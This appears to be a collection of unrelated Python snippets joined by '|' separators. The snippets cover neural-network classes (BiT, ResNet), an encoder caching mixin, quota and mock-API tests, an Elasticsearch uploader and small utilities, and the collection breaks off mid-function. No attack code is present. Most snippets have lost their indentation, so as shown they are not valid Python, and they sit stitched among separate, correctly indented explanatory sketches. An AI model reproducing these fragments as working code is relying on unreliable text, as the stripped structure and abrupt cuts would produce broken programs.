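# above: scatter a one-hot matrix, then blend it with a uniform prior.
import torch
num_classes, eps = 5, 0.1
labels = torch.tensor([0, 3, 2])
targets = torch.zeros(len(labels), num_classes).scatter_(1, labels.view(-1, 1), 1)
targets = (1 - eps) * targets + eps / num_classes
print(targets)  # the true class gets 0.92, every other class 0.02
assert torch.allclose(targets.sum(dim=1), torch.ones(len(labels))) |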
@add_start_docstrings('\n BiT Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for\n ImageNet.\n ', BIT_START_DOCSTRING)
class BitForImageClassification(BitPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bit = BitModel(config)
self.classifier = nn.Sequential(nn.Flatten(), (nn.Linear(config.hidden_sizes[(- 1)], config.num_labels) if (config.num_labels > 0) else nn.Identity()))
self.post_init()
@add_start_docstrings_to_model_forward(BIT_INPUTS_DOCSTRING)
@add_code_sample_docstrings(checkpoint=_IMAGE_CLASS_CHECKPOINT, output_type=ImageClassifierOutputWithNoAttention, config_class=_CONFIG_FOR_DOC, expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT)
def forward(self, pixel_values: Optional[torch.FloatTensor]=None, labels: Optional[torch.LongTensor]=None, output_hidden_states: Optional[bool]=None, return_dict: Optional[bool]=None) -> ImageClassifierOutputWithNoAttention:
return_dict = (return_dict if (return_dict is not None) else self.config.use_return_dict)
outputs = self.bit(pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict)
pooled_output = (outputs.pooler_output if return_dict else outputs[1])
logits = self.classifier(pooled_output)
loss = None
if (labels is not None):
if (self.config.problem_type is None):
if (self.num_labels == 1):
self.config.problem_type = 'regression'
elif ((self.num_labels > 1) and ((labels.dtype == torch.long) or (labels.dtype == torch.int))):
self.config.problem_type = 'single_label_classification'
else:
self.config.problem_type = 'multi_label_classification'
if (self.config.problem_type == 'regression'):
loss_fct = MSELoss()
if (self.num_labels == 1):
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif (self.config.problem_type == 'single_label_classification'):
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view((- 1), self.num_labels), labels.view((- 1)))
elif (self.config.problem_type == 'multi_label_classification'):
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if (not return_dict):
output = ((logits,) + outputs[2:])
return (((loss,) + output) if (loss is not None) else output)
return ImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states) |
def crop(text, width=None, suffix='[...]'):
width = (width if width else settings.CLIENT_DEFAULT_WIDTH)
ltext = len(text)
if (ltext <= width):
return text
else:
lsuffix = len(suffix)
text = (text[:width] if (lsuffix >= width) else ('%s%s' % (text[:(width - lsuffix)], suffix)))
return to_str(text) |
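# Minimal standalone re-sketch of the crop() logic above, with width passed in
# explicitly (settings.CLIENT_DEFAULT_WIDTH and to_str are assumed unavailable
# here): short text passes through, long text is cut so text plus suffix still
# fit within width.
def crop_plain(text, width=78, suffix='[...]'):
    if len(text) <= width:
        return text
    if len(suffix) >= width:
        return text[:width]
    return text[:width - len(suffix)] + suffix

print(crop_plain('short line'))  # unchanged
print(crop_plain('x' * 100, width=20))  # 15 x's + '[...]' == 20 chars |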
class CacheMixin():
@classmethod
def _apply_cache_config(cls, encoders: Union[(Encoder, Dict[(str, Encoder)])], cache_config: CacheConfig) -> Union[(Encoder, Dict[(str, Encoder)])]:
if (cache_config.cache_type == CacheType.NONE):
return encoders
if ((not cache_config.cache_type) and (not cache_config.mapping)):
raise ValueError('If cache is configured, cache_type or mapping have to be set')
if isinstance(encoders, Encoder):
return cls._wrap_encoder(encoders, cache_config=cache_config)
cached_encoders = {}
for (encoder_name, encoder) in encoders.items():
cached_encoders[encoder_name] = cls._wrap_encoder(encoder, cache_config=cache_config, encoder_name=encoder_name)
return {**encoders, **cached_encoders}
@staticmethod
def _check_cuda(cache_type: CacheType, encoder_name: str) -> None:
if ((cache_type == CacheType.GPU) and (not torch.cuda.is_available())):
raise ValueError(f'`CacheType.GPU` has been chosen for `{encoder_name}` encoder, but cuda is not available')
@classmethod
def _wrap_encoder(cls, encoder: Encoder, cache_config: CacheConfig, encoder_name: str='') -> Encoder:
if isinstance(encoder, CacheEncoder):
return encoder
if encoder.trainable:
if (encoder_name in cache_config.mapping):
raise ValueError(f"Can't configure cache for encoder {encoder_name}. Encoder must be frozen to cache it")
return encoder
cache_type = (cache_config.mapping.get(encoder_name) or cache_config.cache_type)
if (cache_type is None):
logger.info(f"{encoder_name} haven't been cached, but could be as non-trainable encoders")
return encoder
cls._check_cuda(cache_type, encoder_name)
return InMemoryCacheEncoder(encoder, cache_type)
@classmethod
def _cache(cls, trainer: pl.Trainer, encoders: Dict[(str, Encoder)], train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader], cache_config: CacheConfig) -> bool:
cache_encoders = {name: encoder for (name, encoder) in encoders.items() if isinstance(encoder, CacheEncoder)}
if (not cache_encoders):
return False
is_full_cache_possible = ((len(cache_encoders) == len(encoders)) and (not cache_config.key_extractors) and (train_dataloader.num_workers == 0) and ((val_dataloader.num_workers == 0) if (val_dataloader is not None) else True))
if is_full_cache_possible:
logger.debug('Using full cache')
if (cache_config.key_extractors and (not isinstance(cache_config.key_extractors, dict))):
key_extractors = {name: cache_config.key_extractors for name in cache_encoders.keys()}
else:
key_extractors = cache_config.key_extractors
cache_collator = CacheTrainCollator(pre_collate_fn=train_dataloader.pre_collate_fn, encoder_collates={name: encoder.get_collate_fn() for (name, encoder) in encoders.items()}, meta_extractors={name: encoder.get_meta_extractor() for (name, encoder) in encoders.items()}, key_extractors=key_extractors, cachable_encoders=list(cache_encoders.keys()), mode=CacheMode.TRAIN)
train_dataloader.collate_fn = cache_collator
if (val_dataloader is not None):
val_dataloader.collate_fn = cache_collator
train_dataloader.set_salt('train')
if (val_dataloader is not None):
val_dataloader.set_salt('val')
is_persisted = cls.check_encoders_persisted(cache_config.save_dir, cache_encoders)
if (not is_persisted):
if is_full_cache_possible:
cls._label_cache_train_mode(train_dataloader, val_dataloader)
cache_collator.mode = CacheMode.FILL
with warnings.catch_warnings():
warnings.filterwarnings('ignore', category=PossibleUserWarning, message='The dataloader, .*')
cls._fill_cache(trainer=trainer, cache_encoders=cache_encoders, train_dataloader=train_dataloader, val_dataloader=val_dataloader, cache_config=cache_config)
cache_collator.mode = CacheMode.TRAIN
logger.debug('Caching has been successfully finished')
cls.save_cache(cache_config.save_dir, cache_encoders, train_dataloader, val_dataloader)
else:
cls.load_cache(cache_config.save_dir, cache_encoders, train_dataloader, val_dataloader)
if is_full_cache_possible:
cls._enable_label_cache(train_dataloader, val_dataloader)
return True
@classmethod
def _fill_cache(cls, trainer: pl.Trainer, cache_encoders: Dict[(str, CacheEncoder)], train_dataloader: SimilarityDataLoader, val_dataloader: SimilarityDataLoader, cache_config: CacheConfig) -> None:
cache_train_dataloader = cls._wrap_cache_dataloader(dataloader=train_dataloader, cache_config=cache_config)
cache_val_dataloader = None
if (val_dataloader is not None):
cache_val_dataloader = cls._wrap_cache_dataloader(dataloader=val_dataloader, cache_config=cache_config)
trainer.predict(CacheModel(cache_encoders), [cache_train_dataloader, cache_val_dataloader], return_predictions=True)
@classmethod
def _unwrap_cache_encoders(cls, encoders: Dict[(str, Encoder)]) -> Dict[(str, Encoder)]:
unwrapped_encoders = {}
for (key, encoder) in encoders.items():
if isinstance(encoder, CacheEncoder):
unwrapped_encoders[key] = encoder.wrapped_encoder
else:
unwrapped_encoders[key] = encoder
return unwrapped_encoders
@classmethod
def _wrap_cache_dataloader(cls, dataloader: SimilarityDataLoader, cache_config: CacheConfig) -> DataLoader:
num_workers = (cache_config.num_workers if (cache_config.num_workers is not None) else dataloader.num_workers)
params = {**dataloader.original_params, 'num_workers': num_workers, 'batch_size': cache_config.batch_size, 'shuffle': False, 'sampler': None}
params.pop('collate_fn')
cache_dl = DataLoader(dataset=dataloader.dataset, collate_fn=dataloader.collate_fn, **params)
return cache_dl
@classmethod
def _label_cache_train_mode(cls, train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
train_dataloader.set_label_cache_mode(LabelCacheMode.learn)
if val_dataloader:
val_dataloader.set_label_cache_mode(LabelCacheMode.learn)
@classmethod
def _enable_label_cache(cls, train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
train_dataloader.set_skip_read(True)
train_dataloader.set_label_cache_mode(LabelCacheMode.read)
if val_dataloader:
val_dataloader.set_skip_read(True)
val_dataloader.set_label_cache_mode(LabelCacheMode.read)
@classmethod
def _encoders_cache_path(cls, dir_path: Optional[str]):
return (os.path.join(dir_path, 'encoders') if dir_path else None)
@classmethod
def check_encoders_persisted(cls, dir_path: Optional[str], encoders: Dict[(str, Encoder)]):
if (not dir_path):
return False
encoders_path = cls._encoders_cache_path(dir_path)
for (key, encoder) in encoders.items():
if (not os.path.exists(os.path.join(encoders_path, key))):
return False
return True
@classmethod
def save_cache(cls, dir_path: Optional[str], encoders: Dict[(str, Encoder)], train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
if (not dir_path):
return
encoders_path = cls._encoders_cache_path(dir_path)
os.makedirs(encoders_path, exist_ok=True)
for (key, encoder) in encoders.items():
if isinstance(encoder, CacheEncoder):
encoder.save_cache(os.path.join(encoders_path, key))
train_dataloader.save_label_cache(os.path.join(dir_path, 'train_labels'))
if val_dataloader:
val_dataloader.save_label_cache(os.path.join(dir_path, 'val_labels'))
logger.debug(f'Cache saved to {dir_path}')
@classmethod
def load_cache(cls, dir_path: str, encoders: Dict[(str, Encoder)], train_dataloader: SimilarityDataLoader, val_dataloader: Optional[SimilarityDataLoader]):
if (not dir_path):
return
encoders_path = cls._encoders_cache_path(dir_path)
for (key, encoder) in encoders.items():
if isinstance(encoder, CacheEncoder):
encoder_cache_path = os.path.join(encoders_path, key)
if (not os.path.exists(encoder_cache_path)):
raise RuntimeError(f'Encoder cache was configured, but not found. Expected to find cache at {encoder_cache_path}, but file does not exists!')
encoder.load_cache(encoder_cache_path)
train_dataloader.load_label_cache(os.path.join(dir_path, 'train_labels'))
if val_dataloader:
val_dataloader.load_label_cache(os.path.join(dir_path, 'val_labels'))
logger.debug(f'Cache loaded from: {dir_path}') |
def init_weight(module_list, conv_init, norm_layer, bn_eps, bn_momentum, **kwargs):
if isinstance(module_list, list):
for feature in module_list:
__init_weight(feature, conv_init, norm_layer, bn_eps, bn_momentum, **kwargs)
else:
__init_weight(module_list, conv_init, norm_layer, bn_eps, bn_momentum, **kwargs) |
def _compute_segment_xform(pos0, pos1):
mid = ((pos0 + pos1) * 0.5)
height = (pos1 - pos0).GetLength()
dir = ((pos1 - pos0) / height)
rot = Gf.Rotation()
rot.SetRotateInto((0.0, 0.0, 1.0), Gf.Vec3d(dir))
scale = Gf.Vec3f(1.0, 1.0, height)
return (mid, Gf.Quath(rot.GetQuat()), scale) |
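# Standalone numpy sketch of the segment transform above (pxr.Gf assumed
# unavailable): midpoint, a quaternion rotating +Z onto the segment direction,
# and a Z scale equal to the segment length. For unit vectors a, b the rotation
# quaternion is (w, xyz) = (1 + a.b, a x b), normalized; a and b must not be
# antiparallel or the quaternion degenerates to zero.
import numpy as np

def segment_xform(pos0, pos1):
    pos0, pos1 = np.asarray(pos0, float), np.asarray(pos1, float)
    mid = 0.5 * (pos0 + pos1)
    height = np.linalg.norm(pos1 - pos0)
    direction = (pos1 - pos0) / height
    z_axis = np.array([0.0, 0.0, 1.0])
    quat = np.concatenate([[1.0 + z_axis @ direction], np.cross(z_axis, direction)])
    quat /= np.linalg.norm(quat)  # (w, x, y, z)
    return mid, quat, np.array([1.0, 1.0, height])

print(segment_xform([0, 0, 0], [0, 3, 0]))  # rotates +Z onto +Y, scales Z by 3 |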
def write_json_file(file_name, mv_array, metric, basis_names, compression=True, transpose=False, sparse=False, support=None, compression_opts=1):
data_dict = {}
data_dict['version'] = '0.0.1'
dset_data = {}
if transpose:
dset_data['data'] = mv_array.T.tolist()
dset_data['transpose'] = True
else:
dset_data['data'] = mv_array.tolist()
dset_data['transpose'] = False
if sparse:
dset_data['sparse'] = True
if (support is not None):
dset_data['support'] = support.tolist()
else:
raise ValueError('You must specify the support of the multivectors if you explicitly specify sparse storage')
else:
dset_data['sparse'] = False
dset_data['support'] = []
data_dict['dataset'] = dset_data
data_dict['metric'] = metric.tolist()
data_dict['basis_names'] = [str(s) for s in basis_names]
with open(file_name, 'w') as fp:
json.dump(data_dict, fp) |
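# Roundtrip sketch for write_json_file above (assumed in scope): write a tiny
# dense multivector array and read it back; the basis names are illustrative.
import json
import numpy as np
mvs = np.arange(8.0).reshape(2, 4)  # two multivectors, four coefficients each
write_json_file('mvs.json', mvs, metric=np.eye(2), basis_names=['1', 'e1', 'e2', 'e12'])
with open('mvs.json') as fp:
    data = json.load(fp)
assert np.allclose(np.array(data['dataset']['data']), mvs)
print(data['basis_names']) |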
def _conv2d_wrapper(x, w, stride=1, padding=0, groups=1, transpose=False, flip_weight=True, impl='cuda'):
(out_channels, in_channels_per_group, kh, kw) = _get_weight_shape(w)
if (not flip_weight):
w = w.flip([2, 3])
if ((kw == 1) and (kh == 1) and (stride == 1) and (padding in [0, [0, 0], (0, 0)]) and (not transpose)):
if ((x.stride()[1] == 1) and (min(out_channels, in_channels_per_group) < 64)):
if ((out_channels <= 4) and (groups == 1)):
in_shape = x.shape
x = (w.squeeze(3).squeeze(2) @ x.reshape([in_shape[0], in_channels_per_group, (- 1)]))
x = x.reshape([in_shape[0], out_channels, in_shape[2], in_shape[3]])
else:
x = x.to(memory_format=torch.contiguous_format)
w = w.to(memory_format=torch.contiguous_format)
x = conv2d_gradfix.conv2d(x, w, groups=groups, impl=impl)
return x.to(memory_format=torch.channels_last)
op = (conv2d_gradfix.conv_transpose2d if transpose else conv2d_gradfix.conv2d)
return op(x, w, stride=stride, padding=padding, groups=groups, impl=impl) |
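# Standalone check of the fast path exploited above: a 1x1, stride-1, unpadded,
# ungrouped convolution is just a channel-mixing matmul, so conv2d can be
# bypassed for that shape.
import torch
x = torch.randn(2, 8, 5, 5)  # (batch, in_channels, h, w)
w = torch.randn(4, 8, 1, 1)  # (out_channels, in_channels, kh, kw)
ref = torch.nn.functional.conv2d(x, w)
mm = (w.squeeze(3).squeeze(2) @ x.reshape(2, 8, -1)).reshape(2, 4, 5, 5)
print(torch.allclose(ref, mm, atol=1e-5))  # True |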
def get_expire_assets():
assets = Assets.objects.all()
expire_assets = []
for asset in assets:
expire_days = (asset.asset_expire_day - datetime.date.today()).days
if (0 < expire_days <= 30):
expire_assets.append({'asset_type': asset.get_asset_type_display(), 'asset_nu': asset.asset_nu, 'asset_ip': asset.asset_management_ip, 'asset_expire': asset.asset_expire_day, 'expire_days': expire_days})
if (len(expire_assets) > 0):
asset_details = ['{} -> :{}\n IP -> {} \n {} {}\n'.format(expire_asset.get('asset_type'), expire_asset.get('asset_nu'), expire_asset.get('asset_ip'), expire_asset.get('asset_expire'), expire_asset.get('expire_days')) for expire_asset in expire_assets]
content = '{}: \n{}'.format(len(asset_details), ' '.join(asset_details))
wx = WxApi('XXXXXXXXXXXXXXXXX', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
wx.send_msg(subject='', content=content) |
class ElasticUploader(BaseUploader):
client: Elasticsearch = None
upload_params = {}
@classmethod
def get_mp_start_method(cls):
return ('forkserver' if ('forkserver' in mp.get_all_start_methods()) else 'spawn')
@classmethod
def init_client(cls, host, distance, connection_params, upload_params):
init_params = {**{'verify_certs': False, 'request_timeout': 90, 'retry_on_timeout': True}, **connection_params}
cls.client = Elasticsearch(f'http://{host}:9200', basic_auth=(ELASTIC_USER, ELASTIC_PASSWORD), **init_params)
cls.upload_params = upload_params
@classmethod
def upload_batch(cls, ids: List[int], vectors: List[list], metadata: Optional[List[dict]]):
if (metadata is None):
metadata = ([{}] * len(vectors))
operations = []
for (idx, vector, payload) in zip(ids, vectors, metadata):
vector_id = uuid.UUID(int=idx).hex
operations.append({'index': {'_id': vector_id}})
if payload:
operations.append({'vector': vector, **payload})
else:
operations.append({'vector': vector})
cls.client.bulk(index=ELASTIC_INDEX, operations=operations)
@classmethod
def post_upload(cls, _distance):
cls.client.indices.forcemerge(index=ELASTIC_INDEX, wait_for_completion=True, max_num_segments=1)
return {} |
def test_window_by_position__equal_spaced_windows():
ds = simulate_genotype_call_dataset(n_variant=5, n_sample=3, seed=0)
assert (not has_windows(ds))
ds['variant_position'] = (['variants'], np.array([1, 4, 6, 8, 12]))
ds = window_by_position(ds, size=5, offset=1)
assert has_windows(ds)
np.testing.assert_equal(ds[window_contig].values, [0, 0, 0])
np.testing.assert_equal(ds[window_start].values, [0, 2, 4])
np.testing.assert_equal(ds[window_stop].values, [2, 4, 5]) |
def returnArray(wrapArgs, lenArgs, inArgs, includeOutput=False):
def decorator(func):
@wraps(func)
def inner(*args):
orig = getattr(_egl, func.__name__)
newArgs = list(args)
for argnum in sorted((wrapArgs + lenArgs)):
if (argnum in wrapArgs):
i = wrapArgs.index(argnum)
item = (orig.argtypes[argnum]._type_ * args[inArgs[i]])()
else:
item = EGLint()
newArgs.insert(argnum, item)
res = orig(*newArgs)
if ((orig.restype is EGLBoolean) and (res.value == 0)):
raise WindowProviderException(f'{func.__name__} failed')
out = []
if includeOutput:
out.append(res)
lengths = []
for argnum in sorted((wrapArgs + lenArgs)):
if (argnum in wrapArgs):
out.append(newArgs[argnum])
else:
lengths.append(newArgs[argnum].value)
if (len(out) == 1):
return out[0]
return tuple(out)
return inner
return decorator |
class ResNet(nn.Module):
def __init__(self, block: Type[Union[(BasicBlock, Bottleneck)]], layers: List[int], num_classes: int=1000, zero_init_residual: bool=False, groups: int=1, width_per_group: int=64, replace_stride_with_dilation: Optional[List[bool]]=None, norm_layer: Optional[Callable[(..., nn.Module)]]=nn.GroupNorm) -> None:
super(ResNet, self).__init__()
self.block = block
if (norm_layer is nn.GroupNorm):
import functools
norm_layer = functools.partial(nn.GroupNorm, num_groups=32)
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if (replace_stride_with_dilation is None):
replace_stride_with_dilation = [False, False, False]
if (len(replace_stride_with_dilation) != 3):
raise ValueError('replace_stride_with_dilation should be None or a 3-element tuple, got {}'.format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(num_channels=self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2, dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2, dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2, dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((2, 2))
self.fc = nn.Linear((512 * block.expansion), num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block: Type[Union[(BasicBlock, Bottleneck)]], planes: int, blocks: int, stride: int=1, dilate: bool=False) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if ((stride != 1) or (self.inplanes != (planes * block.expansion))):
down_list = [conv1x1(self.inplanes, (planes * block.expansion), stride)]
down_list.append(norm_layer(num_channels=(planes * block.expansion)))
downsample = nn.Sequential(*down_list)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups, self.base_width, previous_dilation, norm_layer))
self.inplanes = (planes * block.expansion)
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups, base_width=self.base_width, dilation=self.dilation, norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = rearrange(x, 'b c h w -> b (h w) c')
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x) |
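# Standalone sketch of two pieces used in the ResNet above: functools.partial
# binds num_groups into GroupNorm so it slots in wherever the model calls
# norm_layer(num_channels=...), and einops flattens the final feature map into
# a token sequence (einops assumed installed).
import functools
import torch
import torch.nn as nn
from einops import rearrange
norm_layer = functools.partial(nn.GroupNorm, num_groups=32)
gn = norm_layer(num_channels=64)  # equivalent to nn.GroupNorm(32, 64)
x = torch.randn(2, 64, 7, 7)
print(gn(x).shape)  # torch.Size([2, 64, 7, 7])
print(rearrange(x, 'b c h w -> b (h w) c').shape)  # torch.Size([2, 49, 64]) |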
@patch('torch.__version__', torch_version)
@pytest.mark.parametrize('in_w,in_h,in_t,in_channel,out_channel,kernel_size,stride,padding,dilation', [(10, 10, 10, 1, 1, 3, 1, 0, 1), (20, 20, 20, 3, 3, 5, 2, 1, 2)])
def test_conv3d(in_w, in_h, in_t, in_channel, out_channel, kernel_size, stride, padding, dilation):
x_empty = torch.randn(0, in_channel, in_t, in_h, in_w)
torch.manual_seed(0)
wrapper = Conv3d(in_channel, out_channel, kernel_size, stride=stride, padding=padding, dilation=dilation)
wrapper_out = wrapper(x_empty)
x_normal = torch.randn(3, in_channel, in_t, in_h, in_w).requires_grad_(True)
torch.manual_seed(0)
ref = nn.Conv3d(in_channel, out_channel, kernel_size, stride=stride, padding=padding, dilation=dilation)
ref_out = ref(x_normal)
assert (wrapper_out.shape[0] == 0)
assert (wrapper_out.shape[1:] == ref_out.shape[1:])
wrapper_out.sum().backward()
assert (wrapper.weight.grad is not None)
assert (wrapper.weight.grad.shape == wrapper.weight.shape)
assert torch.equal(wrapper(x_normal), ref_out)
x_empty = torch.randn(0, in_channel, in_t, in_h, in_w)
wrapper = Conv3d(in_channel, out_channel, kernel_size, stride=stride, padding=padding, dilation=dilation)
wrapper.eval()
wrapper(x_empty) |
class catch_warnings(warnings.catch_warnings):
def __init__(self, *classes):
super(catch_warnings, self).__init__(record=True)
self.classes = classes
def __enter__(self):
warning_list = super(catch_warnings, self).__enter__()
treat_deprecations_as_exceptions()
if (len(self.classes) == 0):
warnings.simplefilter('always')
else:
warnings.simplefilter('ignore')
for cls in self.classes:
warnings.simplefilter('always', cls)
return warning_list
def __exit__(self, type, value, traceback):
treat_deprecations_as_exceptions() |
def constant_str(value):
if (type(value) == bool):
if value:
return 'true'
else:
return 'false'
elif (type(value) == str):
return (('"' + str(value.encode('unicode-escape').decode())) + '"')
elif isinstance(value, ctypes.Array):
return (('{' + ', '.join(map(str, value))) + '}')
else:
return str(value) |
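# Quick checks for constant_str above (assumed in scope): booleans become
# C-style literals, strings are escaped and quoted, ctypes arrays become brace
# initializers, everything else falls through to str().
import ctypes
print(constant_str(True))  # true
print(constant_str('tab\there'))  # "tab\there"
print(constant_str((ctypes.c_int * 3)(1, 2, 3)))  # {1, 2, 3}
print(constant_str(42))  # 42 |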
@urlmatch(netloc='fakegitlab', path='/api/v4/projects/4/deploy_keys/1$', method='DELETE')
def delete_deploykey_handler(_, request):
if (not (request.headers.get('Authorization') == 'Bearer foobar')):
return {'status_code': 401}
return {'status_code': 200, 'headers': {'Content-Type': 'application/json'}, 'content': json.dumps({})} |
class TestQuota():
@pytest.fixture(autouse=True)
def setup(self, initialized_db):
user = get_user('devtable')
self.org = create_organization(ORG_NAME, f'{ORG_NAME}', user)
self.repo1 = create_repository(ORG_NAME, REPO1_NAME, user)
self.repo1manifest1 = create_manifest_for_testing(self.repo1, [BLOB1, BLOB2])
self.repo1manifest2 = create_manifest_for_testing(self.repo1, [BLOB1, BLOB3])
self.repo2 = create_repository(ORG_NAME, REPO2_NAME, user)
self.repo2manifest3 = create_manifest_for_testing(self.repo2, [BLOB1, BLOB4])
def test_run_backfill(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
def test_adding_blob(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
with patch('data.model.oci.manifest.features', MagicMock()) as mock_features:
mock_features.QUOTA_MANAGEMENT = True
create_manifest_for_testing(self.repo1, [BLOB5])
assert (get_namespace_size(ORG_NAME) == (((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)) + len(BLOB5)))
assert (get_repository_size(self.repo1) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB5)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
def test_subtracting_blob(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
with patch('data.model.gc.features', MagicMock()) as mock_features:
mock_features.QUOTA_MANAGEMENT = True
tag_deleted = _delete_tag_for_manifest(self.repo2manifest3.id)
assert tag_deleted
context = _GarbageCollectorContext(self.repo2)
context.add_manifest_id(self.repo2manifest3.id)
manifest_deleted = _garbage_collect_manifest(self.repo2manifest3.id, context)
assert manifest_deleted
assert (get_namespace_size(ORG_NAME) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == 0)
def test_disabled_namespace(self, initialized_db):
run_backfill(self.org.id)
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
self.org.enabled = False
self.org.save()
with patch('data.model.oci.manifest.features', MagicMock()) as mock_features:
mock_features.QUOTA_MANAGEMENT = True
create_manifest_for_testing(self.repo1, [BLOB5])
assert (get_namespace_size(ORG_NAME) == ((((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)) + len(BLOB4)))
assert (get_repository_size(self.repo1) == (((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB2)) + len(BLOB3)))
assert (get_repository_size(self.repo2) == ((len(CONFIG_LAYER_JSON) + len(BLOB1)) + len(BLOB4)))
def test_calculate_registry_size(self, initialized_db):
QuotaRegistrySize.insert({'size_bytes': 0, 'running': False, 'queued': True, 'completed_ms': None}).execute()
calculate_registry_size()
registry_size = get_registry_size()
assert (registry_size is not None)
assert (registry_size != 0)
assert (registry_size.size_bytes == sum_registry_size())
def test_queue_registry_size_calculation(self, initialized_db):
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert (not already_queued)
registry_size = get_registry_size()
assert (registry_size is not None)
assert registry_size.queued
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert already_queued
QuotaRegistrySize.update({'running': False, 'queued': False}).execute()
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert (not already_queued)
QuotaRegistrySize.update({'running': True, 'queued': False}).execute()
(queued, already_queued) = queue_registry_size_calculation()
assert queued
assert already_queued |
class MediaLoader():
def __init__(self, folder):
logger.debug("Initializing %s: (folder: '%s')", self.__class__.__name__, folder)
logger.info('[%s DATA]', self.__class__.__name__.upper())
self._count = None
self.folder = folder
self.vid_reader = self.check_input_folder()
self.file_list_sorted = self.sorted_items()
self.items = self.load_items()
logger.verbose('%s items loaded', self.count)
logger.debug('Initialized %s', self.__class__.__name__)
@property
def is_video(self):
return (self.vid_reader is not None)
@property
def count(self):
if (self._count is not None):
return self._count
if self.is_video:
self._count = int(count_frames_and_secs(self.folder)[0])
else:
self._count = len(self.file_list_sorted)
return self._count
def check_input_folder(self):
err = None
loadtype = self.__class__.__name__
if (not self.folder):
err = 'ERROR: A {} folder must be specified'.format(loadtype)
elif (not os.path.exists(self.folder)):
